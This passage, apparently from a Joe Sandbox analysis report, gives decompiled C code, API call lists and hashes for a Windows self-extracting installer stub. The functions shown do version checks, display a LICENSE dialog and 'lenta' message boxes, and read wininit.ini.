                                                                      								goto L12;
                                                                      							} else {
                                                                      								_t40 =  &_v176;
                                                                      								if(E011D66F9( &_v20,  &_v176) == 0) {
                                                                      									goto L12;
                                                                      								} else {
                                                                      									_t35 = _v176 & 0x000003ff;
                                                                      									if(_t35 == 1 || _t35 == 0xd) {
                                                                      										 *0x11d81d8 = _t41;
                                                                      									} else {
                                                                      										goto L12;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return E011D6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                      			}


















                                                                      0x011d681f
                                                                      0x011d682a
                                                                      0x011d6831
                                                                      0x011d6836
                                                                      0x011d683c
                                                                      0x011d683e
                                                                      0x011d6848
                                                                      0x011d6851
                                                                      0x011d685d
                                                                      0x011d6864
                                                                      0x011d6876
                                                                      0x011d693a
                                                                      0x011d693a
                                                                      0x011d687c
                                                                      0x011d687e
                                                                      0x011d6885
                                                                      0x00000000
                                                                      0x011d68d6
                                                                      0x011d68f4
                                                                      0x011d6900
                                                                      0x011d6902
                                                                      0x011d690a
                                                                      0x00000000
                                                                      0x011d690c
                                                                      0x011d690c
                                                                      0x011d691c
                                                                      0x00000000
                                                                      0x011d691e
                                                                      0x011d6924
                                                                      0x011d692b
                                                                      0x011d6932
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d692b
                                                                      0x011d691c
                                                                      0x011d690a
                                                                      0x011d6885
                                                                      0x011d6876
                                                                      0x011d6951

                                                                      APIs
                                                                      • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 011D686E
                                                                      • GetSystemMetrics.USER32(0000004A), ref: 011D68A7
                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 011D68CC
                                                                      • RegQueryValueExA.ADVAPI32(?,011D1140,00000000,?,?,0000000C), ref: 011D68F4
                                                                      • RegCloseKey.ADVAPI32(?), ref: 011D6902
                                                                        • Part of subcall function 011D66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,011D691A), ref: 011D6741
                                                                      Strings
                                                                      • Control Panel\Desktop\ResourceLocale, xrefs: 011D68C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                      • String ID: Control Panel\Desktop\ResourceLocale
                                                                      • API String ID: 3346862599-1109908249
                                                                      • Opcode ID: 35e118af548d055cfa9f59e99782adb73938f5888ea292ca3f414a05bfb537e8
                                                                      • Instruction ID: 67d3cb4a5908bef38395e558efa1c24a3eb5ab249b05192c595c6b09b382b098
                                                                      • Opcode Fuzzy Hash: 35e118af548d055cfa9f59e99782adb73938f5888ea292ca3f414a05bfb537e8
                                                                      • Instruction Fuzzy Hash: F6319131A02228DFDB39DF69DC44BEAB7B8EF45668F0401A5E95DA3140E7309A85CF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D3A3F(void* __eflags) {
                                                                      				void* _t3;
                                                                      				void* _t9;
                                                                      				CHAR* _t16;
                                                                      
                                                                      				_t16 = "LICENSE";
                                                                      				_t1 = E011D468F(_t16, 0, 0) + 1; // 0x1
                                                                      				_t3 = LocalAlloc(0x40, _t1);
                                                                      				 *0x11d8d4c = _t3;
                                                                      				if(_t3 != 0) {
                                                                      					_t19 = _t16;
                                                                      					if(E011D468F(_t16, _t3, _t28) != 0) {
                                                                      						if(lstrcmpA( *0x11d8d4c, "<None>") == 0) {
                                                                      							LocalFree( *0x11d8d4c);
                                                                      							L9:
                                                                      							 *0x11d9124 = 0;
                                                                      							return 1;
                                                                      						}
                                                                      						_t9 = E011D6517(_t19, 0x7d1, 0, E011D3100, 0, 0);
                                                                      						LocalFree( *0x11d8d4c);
                                                                      						if(_t9 != 0) {
                                                                      							goto L9;
                                                                      						}
                                                                      						 *0x11d9124 = 0x800704c7;
                                                                      						L2:
                                                                      						return 0;
                                                                      					}
                                                                      					E011D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      					LocalFree( *0x11d8d4c);
                                                                      					 *0x11d9124 = 0x80070714;
                                                                      					goto L2;
                                                                      				}
                                                                      				E011D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      				 *0x11d9124 = E011D6285();
                                                                      				goto L2;
                                                                      			}






                                                                      0x011d3a46
                                                                      0x011d3a57
                                                                      0x011d3a5d
                                                                      0x011d3a63
                                                                      0x011d3a6a
                                                                      0x011d3a91
                                                                      0x011d3a9a
                                                                      0x011d3ad8
                                                                      0x011d3b13
                                                                      0x011d3b19
                                                                      0x011d3b1b
                                                                      0x00000000
                                                                      0x011d3b21
                                                                      0x011d3ae7
                                                                      0x011d3af4
                                                                      0x011d3afc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3afe
                                                                      0x011d3a87
                                                                      0x00000000
                                                                      0x011d3a87
                                                                      0x011d3aa8
                                                                      0x011d3ab3
                                                                      0x011d3ab9
                                                                      0x00000000
                                                                      0x011d3ab9
                                                                      0x011d3a78
                                                                      0x011d3a82
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,011D2F64,?,00000002,00000000), ref: 011D3A5D
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 011D3AB3
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                        • Part of subcall function 011D6285: GetLastError.KERNEL32(011D5BBC), ref: 011D6285
                                                                      • lstrcmpA.KERNEL32(<None>,00000000), ref: 011D3AD0
                                                                      • LocalFree.KERNEL32 ref: 011D3B13
                                                                        • Part of subcall function 011D6517: FindResourceA.KERNEL32(011D0000,000007D6,00000005), ref: 011D652A
                                                                        • Part of subcall function 011D6517: LoadResource.KERNEL32(011D0000,00000000,?,?,011D2EE8,00000000,011D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 011D6538
                                                                        • Part of subcall function 011D6517: DialogBoxIndirectParamA.USER32(011D0000,00000000,00000547,011D19E0,00000000), ref: 011D6557
                                                                        • Part of subcall function 011D6517: FreeResource.KERNEL32(00000000,?,?,011D2EE8,00000000,011D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 011D6560
                                                                      • LocalFree.KERNEL32(00000000,011D3100,00000000,00000000), ref: 011D3AF4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                      • String ID: <None>$LICENSE
                                                                      • API String ID: 2414642746-383193767
                                                                      • Opcode ID: 6d8f9df35e19d1037d119190c48c7ddeefae79d8aa63994b45bc0849eeb12d10
                                                                      • Instruction ID: 7ad4b8d53a1dfed0eab8195584b0c4a05e875afb36d95a3088765295ebe726d0
                                                                      • Opcode Fuzzy Hash: 6d8f9df35e19d1037d119190c48c7ddeefae79d8aa63994b45bc0849eeb12d10
                                                                      • Instruction Fuzzy Hash: 7611D3B0703211BBD73CAF3AAC09E1B7AB9EFD5750B10413EF562D6588DB7988408762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E011D24E0(void* __ebx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t7;
                                                                      				void* _t20;
                                                                      				long _t26;
                                                                      				signed int _t27;
                                                                      
                                                                      				_t20 = __ebx;
                                                                      				_t7 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t7 ^ _t27;
                                                                      				_t25 = 0x104;
                                                                      				_t26 = 0;
                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                      					E011D658A( &_v268, 0x104, "wininit.ini");
                                                                      					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                      					_t25 = _lopen( &_v268, 0x40);
                                                                      					if(_t25 != 0xffffffff) {
                                                                      						_t26 = _llseek(_t25, 0, 2);
                                                                      						_lclose(_t25);
                                                                      					}
                                                                      				}
                                                                      				return E011D6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                      			}











                                                                      0x011d24e0
                                                                      0x011d24eb
                                                                      0x011d24f2
                                                                      0x011d24f7
                                                                      0x011d2504
                                                                      0x011d250e
                                                                      0x011d251d
                                                                      0x011d252c
                                                                      0x011d2541
                                                                      0x011d2546
                                                                      0x011d2553
                                                                      0x011d2555
                                                                      0x011d2555
                                                                      0x011d2546
                                                                      0x011d256c

                                                                      APIs
                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 011D2506
                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 011D252C
                                                                      • _lopen.KERNEL32(?,00000040), ref: 011D253B
                                                                      • _llseek.KERNEL32(00000000,00000000,00000002), ref: 011D254C
                                                                      • _lclose.KERNEL32(00000000), ref: 011D2555
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                      • String ID: wininit.ini
                                                                      • API String ID: 3273605193-4206010578
                                                                      • Opcode ID: 229b2207e0cf06923fa300daea14eb2c29ba58e1809389a716789803ee764c20
                                                                      • Instruction ID: e6ad8168631f6e8f96fefcf1f43f9bf08fe371de870528c571eb8036568d2d2b
                                                                      • Opcode Fuzzy Hash: 229b2207e0cf06923fa300daea14eb2c29ba58e1809389a716789803ee764c20
                                                                      • Instruction Fuzzy Hash: D701923260212867D734DA69AC08EDB7B7CDF45750F400165FA59D3184DB749A81CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E011D36EE(CHAR* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				struct _OSVERSIONINFOA _v416;
                                                                      				signed int _v420;
                                                                      				signed int _v424;
                                                                      				CHAR* _v428;
                                                                      				CHAR* _v432;
                                                                      				signed int _v436;
                                                                      				CHAR* _v440;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t72;
                                                                      				CHAR* _t77;
                                                                      				CHAR* _t91;
                                                                      				CHAR* _t94;
                                                                      				int _t97;
                                                                      				CHAR* _t98;
                                                                      				signed char _t99;
                                                                      				CHAR* _t104;
                                                                      				signed short _t107;
                                                                      				signed int _t109;
                                                                      				short _t113;
                                                                      				void* _t114;
                                                                      				signed char _t115;
                                                                      				short _t119;
                                                                      				CHAR* _t123;
                                                                      				CHAR* _t124;
                                                                      				CHAR* _t129;
                                                                      				signed int _t131;
                                                                      				signed int _t132;
                                                                      				CHAR* _t135;
                                                                      				CHAR* _t138;
                                                                      				signed int _t139;
                                                                      
                                                                      				_t72 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t72 ^ _t139;
                                                                      				_v416.dwOSVersionInfoSize = 0x94;
                                                                      				_t115 = __ecx;
                                                                      				_t135 = 0;
                                                                      				_v432 = __ecx;
                                                                      				_t138 = 0;
                                                                      				if(GetVersionExA( &_v416) != 0) {
                                                                      					_t133 = _v416.dwMajorVersion;
                                                                      					_t119 = 2;
                                                                      					_t77 = _v416.dwPlatformId - 1;
                                                                      					__eflags = _t77;
                                                                      					if(_t77 == 0) {
                                                                      						_t119 = 0;
                                                                      						__eflags = 1;
                                                                      						 *0x11d8184 = 1;
                                                                      						 *0x11d8180 = 1;
                                                                      						L13:
                                                                      						 *0x11d9a40 = _t119;
                                                                      						L14:
                                                                      						__eflags =  *0x11d8a34 - _t138; // 0x0
                                                                      						if(__eflags != 0) {
                                                                      							goto L66;
                                                                      						}
                                                                      						__eflags = _t115;
                                                                      						if(_t115 == 0) {
                                                                      							goto L66;
                                                                      						}
                                                                      						_v428 = _t135;
                                                                      						__eflags = _t119;
                                                                      						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                      						_t11 =  &_v420;
                                                                      						 *_t11 = _v420 & _t138;
                                                                      						__eflags =  *_t11;
                                                                      						_v440 = _t115;
                                                                      						do {
                                                                      							_v424 = _t135 * 0x18;
                                                                      							_v436 = E011D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                      							_t91 = E011D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                      							_t123 = _v436;
                                                                      							_t133 = 0x54d;
                                                                      							__eflags = _t123;
                                                                      							if(_t123 < 0) {
                                                                      								L32:
                                                                      								__eflags = _v420 - 1;
                                                                      								if(_v420 == 1) {
                                                                      									_t138 = 0x54c;
                                                                      									L36:
                                                                      									__eflags = _t138;
                                                                      									if(_t138 != 0) {
                                                                      										L40:
                                                                      										__eflags = _t138 - _t133;
                                                                      										if(_t138 == _t133) {
                                                                      											L30:
                                                                      											_v420 = _v420 & 0x00000000;
                                                                      											_t115 = 0;
                                                                      											_v436 = _v436 & 0x00000000;
                                                                      											__eflags = _t138 - _t133;
                                                                      											_t133 = _v432;
                                                                      											if(__eflags != 0) {
                                                                      												_t124 = _v440;
                                                                      											} else {
                                                                      												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                      												_v420 =  &_v268;
                                                                      											}
                                                                      											__eflags = _t124;
                                                                      											if(_t124 == 0) {
                                                                      												_t135 = _v436;
                                                                      											} else {
                                                                      												_t99 = _t124[0x30];
                                                                      												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                      												__eflags = _t99 & 0x00000001;
                                                                      												if((_t99 & 0x00000001) == 0) {
                                                                      													asm("sbb ebx, ebx");
                                                                      													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                      												} else {
                                                                      													_t115 = 0x104;
                                                                      												}
                                                                      											}
                                                                      											__eflags =  *0x11d8a38 & 0x00000001;
                                                                      											if(( *0x11d8a38 & 0x00000001) != 0) {
                                                                      												L64:
                                                                      												_push(0);
                                                                      												_push(0x30);
                                                                      												_push(_v420);
                                                                      												_push("lenta");
                                                                      												goto L65;
                                                                      											} else {
                                                                      												__eflags = _t135;
                                                                      												if(_t135 == 0) {
                                                                      													goto L64;
                                                                      												}
                                                                      												__eflags =  *_t135;
                                                                      												if( *_t135 == 0) {
                                                                      													goto L64;
                                                                      												}
                                                                      												MessageBeep(0);
                                                                      												_t94 = E011D681F(_t115);
                                                                      												__eflags = _t94;
                                                                      												if(_t94 == 0) {
                                                                      													L57:
                                                                      													0x180030 = 0x30;
                                                                      													L58:
                                                                      													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                      													__eflags = _t115 & 0x00000004;
                                                                      													if((_t115 & 0x00000004) == 0) {
                                                                      														__eflags = _t115 & 0x00000001;
                                                                      														if((_t115 & 0x00000001) == 0) {
                                                                      															goto L66;
                                                                      														}
                                                                      														__eflags = _t97 - 1;
                                                                      														L62:
                                                                      														if(__eflags == 0) {
                                                                      															_t138 = 0;
                                                                      														}
                                                                      														goto L66;
                                                                      													}
                                                                      													__eflags = _t97 - 6;
                                                                      													goto L62;
                                                                      												}
                                                                      												_t98 = E011D67C9(_t124, _t124);
                                                                      												__eflags = _t98;
                                                                      												if(_t98 == 0) {
                                                                      													goto L57;
                                                                      												}
                                                                      												goto L58;
                                                                      											}
                                                                      										}
                                                                      										__eflags = _t138 - 0x54c;
                                                                      										if(_t138 == 0x54c) {
                                                                      											goto L30;
                                                                      										}
                                                                      										__eflags = _t138;
                                                                      										if(_t138 == 0) {
                                                                      											goto L66;
                                                                      										}
                                                                      										_t135 = 0;
                                                                      										__eflags = 0;
                                                                      										goto L44;
                                                                      									}
                                                                      									L37:
                                                                      									_t129 = _v432;
                                                                      									__eflags = _t129[0x7c];
                                                                      									if(_t129[0x7c] == 0) {
                                                                      										goto L66;
                                                                      									}
                                                                      									_t133 =  &_v268;
                                                                      									_t104 = E011D28E8(_t129,  &_v268, _t129,  &_v428);
                                                                      									__eflags = _t104;
                                                                      									if(_t104 != 0) {
                                                                      										goto L66;
                                                                      									}
                                                                      									_t135 = _v428;
                                                                      									_t133 = 0x54d;
                                                                      									_t138 = 0x54d;
                                                                      									goto L40;
                                                                      								}
                                                                      								goto L33;
                                                                      							}
                                                                      							__eflags = _t91;
                                                                      							if(_t91 > 0) {
                                                                      								goto L32;
                                                                      							}
                                                                      							__eflags = _t123;
                                                                      							if(_t123 != 0) {
                                                                      								__eflags = _t91;
                                                                      								if(_t91 != 0) {
                                                                      									goto L37;
                                                                      								}
                                                                      								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                      								L27:
                                                                      								if(__eflags <= 0) {
                                                                      									goto L37;
                                                                      								}
                                                                      								L28:
                                                                      								__eflags = _t135;
                                                                      								if(_t135 == 0) {
                                                                      									goto L33;
                                                                      								}
                                                                      								_t138 = 0x54c;
                                                                      								goto L30;
                                                                      							}
                                                                      							__eflags = _t91;
                                                                      							_t107 = _v416.dwBuildNumber;
                                                                      							if(_t91 != 0) {
                                                                      								_t131 = _v424;
                                                                      								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                      								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                      									goto L37;
                                                                      								}
                                                                      								goto L28;
                                                                      							}
                                                                      							_t132 = _t107 & 0x0000ffff;
                                                                      							_t109 = _v424;
                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                      							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                      								goto L28;
                                                                      							}
                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                      							goto L27;
                                                                      							L33:
                                                                      							_t135 =  &(_t135[1]);
                                                                      							_v428 = _t135;
                                                                      							_v420 = _t135;
                                                                      							__eflags = _t135 - 2;
                                                                      						} while (_t135 < 2);
                                                                      						goto L36;
                                                                      					}
                                                                      					__eflags = _t77 == 1;
                                                                      					if(_t77 == 1) {
                                                                      						 *0x11d9a40 = _t119;
                                                                      						 *0x11d8184 = 1;
                                                                      						 *0x11d8180 = 1;
                                                                      						__eflags = _t133 - 3;
                                                                      						if(_t133 > 3) {
                                                                      							__eflags = _t133 - 5;
                                                                      							if(_t133 < 5) {
                                                                      								goto L14;
                                                                      							}
                                                                      							_t113 = 3;
                                                                      							_t119 = _t113;
                                                                      							goto L13;
                                                                      						}
                                                                      						_t119 = 1;
                                                                      						_t114 = 3;
                                                                      						 *0x11d9a40 = 1;
                                                                      						__eflags = _t133 - _t114;
                                                                      						if(__eflags < 0) {
                                                                      							L9:
                                                                      							 *0x11d8184 = _t135;
                                                                      							 *0x11d8180 = _t135;
                                                                      							goto L14;
                                                                      						}
                                                                      						if(__eflags != 0) {
                                                                      							goto L14;
                                                                      						}
                                                                      						__eflags = _v416.dwMinorVersion - 0x33;
                                                                      						if(_v416.dwMinorVersion >= 0x33) {
                                                                      							goto L14;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					_t138 = 0x4ca;
                                                                      					goto L44;
                                                                      				} else {
                                                                      					_t138 = 0x4b4;
                                                                      					L44:
                                                                      					_push(_t135);
                                                                      					_push(0x10);
                                                                      					_push(_t135);
                                                                      					_push(_t135);
                                                                      					L65:
                                                                      					_t133 = _t138;
                                                                      					E011D44B9(0, _t138);
                                                                      					L66:
                                                                      					return E011D6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                      				}
                                                                      			}





































                                                                      0x011d36f9
                                                                      0x011d3700
                                                                      0x011d370c
                                                                      0x011d3716
                                                                      0x011d3718
                                                                      0x011d371b
                                                                      0x011d3721
                                                                      0x011d372b
                                                                      0x011d373d
                                                                      0x011d3745
                                                                      0x011d3746
                                                                      0x011d3746
                                                                      0x011d3749
                                                                      0x011d37ab
                                                                      0x011d37ad
                                                                      0x011d37ae
                                                                      0x011d37b3
                                                                      0x011d37b8
                                                                      0x011d37b8
                                                                      0x011d37bf
                                                                      0x011d37bf
                                                                      0x011d37c5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d37cb
                                                                      0x011d37cd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d37d5
                                                                      0x011d37db
                                                                      0x011d37e8
                                                                      0x011d37ea
                                                                      0x011d37ea
                                                                      0x011d37ea
                                                                      0x011d37f0
                                                                      0x011d37f6
                                                                      0x011d3805
                                                                      0x011d3817
                                                                      0x011d382b
                                                                      0x011d3830
                                                                      0x011d3836
                                                                      0x011d383b
                                                                      0x011d383d
                                                                      0x011d38eb
                                                                      0x011d38eb
                                                                      0x011d38f2
                                                                      0x011d390c
                                                                      0x011d3911
                                                                      0x011d3911
                                                                      0x011d3913
                                                                      0x011d394d
                                                                      0x011d394d
                                                                      0x011d394f
                                                                      0x011d38a9
                                                                      0x011d38a9
                                                                      0x011d38b0
                                                                      0x011d38b2
                                                                      0x011d38b9
                                                                      0x011d38bb
                                                                      0x011d38c1
                                                                      0x011d3975
                                                                      0x011d38c7
                                                                      0x011d38de
                                                                      0x011d38e0
                                                                      0x011d38e0
                                                                      0x011d397b
                                                                      0x011d397d
                                                                      0x011d39a9
                                                                      0x011d397f
                                                                      0x011d3982
                                                                      0x011d398b
                                                                      0x011d398d
                                                                      0x011d398f
                                                                      0x011d399f
                                                                      0x011d39a1
                                                                      0x011d3991
                                                                      0x011d3991
                                                                      0x011d3991
                                                                      0x011d398f
                                                                      0x011d39af
                                                                      0x011d39b6
                                                                      0x011d3a0f
                                                                      0x011d3a0f
                                                                      0x011d3a11
                                                                      0x011d3a13
                                                                      0x011d3a19
                                                                      0x00000000
                                                                      0x011d39b8
                                                                      0x011d39b8
                                                                      0x011d39ba
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d39bc
                                                                      0x011d39bf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d39c3
                                                                      0x011d39c9
                                                                      0x011d39ce
                                                                      0x011d39d0
                                                                      0x011d39e3
                                                                      0x011d39e5
                                                                      0x011d39e6
                                                                      0x011d39f1
                                                                      0x011d39f7
                                                                      0x011d39fa
                                                                      0x011d3a01
                                                                      0x011d3a04
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3a06
                                                                      0x011d3a09
                                                                      0x011d3a09
                                                                      0x011d3a0b
                                                                      0x011d3a0b
                                                                      0x00000000
                                                                      0x011d3a09
                                                                      0x011d39fc
                                                                      0x00000000
                                                                      0x011d39fc
                                                                      0x011d39d3
                                                                      0x011d39d8
                                                                      0x011d39da
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d39dc
                                                                      0x011d39b6
                                                                      0x011d3955
                                                                      0x011d395b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3961
                                                                      0x011d3963
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3969
                                                                      0x011d3969
                                                                      0x00000000
                                                                      0x011d3969
                                                                      0x011d3915
                                                                      0x011d3915
                                                                      0x011d391b
                                                                      0x011d391f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d392d
                                                                      0x011d3933
                                                                      0x011d3938
                                                                      0x011d393a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3940
                                                                      0x011d3946
                                                                      0x011d394b
                                                                      0x00000000
                                                                      0x011d394b
                                                                      0x00000000
                                                                      0x011d38f2
                                                                      0x011d3843
                                                                      0x011d3845
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d384b
                                                                      0x011d384d
                                                                      0x011d3883
                                                                      0x011d3885
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d389a
                                                                      0x011d389e
                                                                      0x011d389e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d38a0
                                                                      0x011d38a0
                                                                      0x011d38a2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d38a4
                                                                      0x00000000
                                                                      0x011d38a4
                                                                      0x011d384f
                                                                      0x011d3851
                                                                      0x011d3857
                                                                      0x011d386e
                                                                      0x011d3877
                                                                      0x011d387b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3881
                                                                      0x011d3859
                                                                      0x011d385c
                                                                      0x011d3862
                                                                      0x011d3866
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3868
                                                                      0x00000000
                                                                      0x011d38f4
                                                                      0x011d38f4
                                                                      0x011d38f5
                                                                      0x011d38fb
                                                                      0x011d3901
                                                                      0x011d3901
                                                                      0x00000000
                                                                      0x011d390a
                                                                      0x011d374b
                                                                      0x011d374e
                                                                      0x011d375c
                                                                      0x011d3764
                                                                      0x011d3769
                                                                      0x011d376e
                                                                      0x011d3771
                                                                      0x011d379c
                                                                      0x011d379f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d37a3
                                                                      0x011d37a4
                                                                      0x00000000
                                                                      0x011d37a4
                                                                      0x011d3773
                                                                      0x011d3777
                                                                      0x011d3778
                                                                      0x011d377f
                                                                      0x011d3781
                                                                      0x011d378e
                                                                      0x011d378e
                                                                      0x011d3794
                                                                      0x00000000
                                                                      0x011d3794
                                                                      0x011d3783
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d3785
                                                                      0x011d378c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d378c
                                                                      0x011d3750
                                                                      0x00000000
                                                                      0x011d372d
                                                                      0x011d372d
                                                                      0x011d396b
                                                                      0x011d396b
                                                                      0x011d396c
                                                                      0x011d396e
                                                                      0x011d396f
                                                                      0x011d3a1e
                                                                      0x011d3a1e
                                                                      0x011d3a22
                                                                      0x011d3a27
                                                                      0x011d3a3e
                                                                      0x011d3a3e

                                                                      APIs
                                                                      • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 011D3723
                                                                      • MessageBeep.USER32(00000000), ref: 011D39C3
                                                                      • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 011D39F1
                                                                      Strings
                                                                      Memory Dump Source
